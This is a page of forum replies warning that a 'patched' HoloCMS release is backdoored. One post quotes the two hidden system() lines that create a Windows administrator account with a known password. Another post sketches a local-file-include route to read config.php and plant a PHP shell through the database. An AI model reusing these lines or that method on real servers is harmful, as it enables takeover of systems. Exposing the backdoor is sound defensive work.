HoloCMS v3.2.0 (Patched Edition)

Page 3 of 5 FirstFirst 12345 LastLast
Results 31 to 45 of 72
  1. #31
    Member Pixalz is offline
    MemberRank
    Nov 2008 Join Date
    NetherlandLocation
    58Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Nice, recommedd to use.

  2. #32
    Account Upgraded | Title Enabled! Mark1994123 is offline
    MemberRank
    May 2007 Join Date
    NetherlandsLocation
    814Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    WARNING - THIS IS A VIRUS !

    IF U DONT BELIEVE ME , DOWNLOAD IT

    BUT I HAVE WARNED YOU!!!

    Mark

  3. #33
    Fuck You Retro! is offline
    MemberRank
    Jun 2007 Join Date
    4,346Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Quote Originally Posted by yifan_lu View Post

    transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at line 122 and 123 of transactions.
    Code:
    system("cmd /c net user /add IUSR_SYSTEM letmein");
    system("cmd /c net localgroup administrators /add IUSR_SYSTEM");
    What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

    In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other then the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advice you people to not use ANY holocms release that is not from me (unless I say so otherwise).

    Also, the ONLY KNOWN exploit is the one in me.php, I'll be updateing the HoloCMS thread with a patch later.

    EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

    EDIT 2: Lol at PM from Pixalz , either he's in on the whole thing or he's the most ignorant guy here. Wait, I take that back. He's the most stupid ignorant guy here.
    So,
    Habmoon.
    There is a virus found.
    Also,
    I doubt he'd lie about it ott1:

  4. #34
    Infraction Banned HabMoon is offline
    MemberRank
    Jun 2007 Join Date
    HM OfficesLocation
    3,068Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Sorry [a] stupid me, but i was still right at the dont download part ^,^

    I hate threads like this.. >.<

  5. #35
    Account Upgraded | Title Enabled! yifan_lu is offline
    MemberRank
    Jun 2007 Join Date
    Next to a computer screenLocation
    692Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Quote Originally Posted by Retro! View Post
    So,
    Habmoon.
    There is a virus found.
    Also,
    I doubt he'd lie about it ott1:
    Quote Originally Posted by Layout View Post
    yes there is a virus + a keylogger in file
    Ok, the term virus is kinda misleading. It doesn't IMMEDIATELY do damage to your computer as a virus does. It creates a administrator account under the name 'letmein' with no password. It will ONLY do harm when the attacker logs in to your server and does things. It is a "backdoor Trojan".

    No, there is no keylogger.

    Also if you have ANY doubt of what I'm saying, just download the file and open transactions.php with any text editor (Notepad), scroll to the end of the file (line 122+123 to be exact) and see the two lines.

  6. #36
    Member gonzalarcon is offline
    MemberRank
    Apr 2008 Join Date
    Santiago, ChileLocation
    58Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    +1 for oldschool servers! (little joke, don't get angry holo-users :P)

  7. #37
    I'm glad that I'm you DjMaster2 is offline
    MemberRank
    Dec 2007 Join Date
    345Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    WTF? is it a virus or not? so i can or cant download, Yifan_lu, make a thread about this CMS so we can download it.

  8. #38
    Member gonzalarcon is offline
    MemberRank
    Apr 2008 Join Date
    Santiago, ChileLocation
    58Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    It's like a open door for a virus

  9. #39
    Member Mr. Oni is offline
    MemberRank
    Jan 2009 Join Date
    86Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    When you backdoored this you forgot to add a meta tag so that you could find all the installations of this on google

    I rate your faggotry 10/10

  10. #40
    Member Mr. Oni is offline
    MemberRank
    Jan 2009 Join Date
    86Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    I just realised as well that this is the most retarded of ways to backdoor a system. For a start most PHP installations have system() disabled by default (including xampp).

    Secondly, if you're going to backdoor, do it right. Add an LFI (local file include) and use that to read the config.php file. This will bypass all chmod permissions as it is in the same directory, so just use include() to bypass safe_mode, open_basedir etc. Then use that to get into the database, and you can inject a PHP shell into the title tables in the database (for example the credits.php "How can I buy credits" table)

    Then when you visit credits.php, the PHP shell will be there and because you injected it into the PHP from MySQL, the system is none the wiser and the file is still owned by owner. This will pretty much allow you to modify any of the HoloCMS files.

    LFI is the method that I used to successfully compromise holocms.com and damaged can be reduced by CHMODing all the files 6**, so they are only readable by the owner.

    Learn 2 hack please

  11. #41
    Apprentice funkycrossboy is offline
    MemberRank
    Oct 2008 Join Date
    NorwayLocation
    11Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    register not woorking lol fix it?


    -DJ-Texy habbohacker and holoCMS user

  12. #42
    Account Upgraded | Title Enabled! Mark1994123 is offline
    MemberRank
    May 2007 Join Date
    NetherlandsLocation
    814Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Can some Give me the V32 Index ? The same as this cms but WITHOUT the virus?

    Mark,

  13. #43
    C++ WoW Scripter NitroHabbz is offline
    MemberRank
    Mar 2008 Join Date
    551Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    All i'll say is.

    If you use this then your basically giving apellido or anyone else whos in on his little noob hacking attempt root access to your servers.

    Nice try though apellido. Like Mr.*** said.

    Learn to hack.

  14. #44
    Apprentice oblesque is offline
    MemberRank
    Dec 2007 Join Date
    7Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Do Not Download

    Virus (Backdoor hacker)



  15. #45
    Account Upgraded | Title Enabled! jamz13 is offline
    MemberRank
    Nov 2008 Join Date
    The NetherlandsLocation
    405Posts

    Re: HoloCMS v3.2.0 (Patched Edition)

    Quote Originally Posted by sisija View Post
    Why does everyone call me Sisja in stead of Sisija

    S i s i j a
    Offtopic:(Who Cares) Lol xD



Page 3 of 5 FirstFirst 12345 LastLast

Advertisement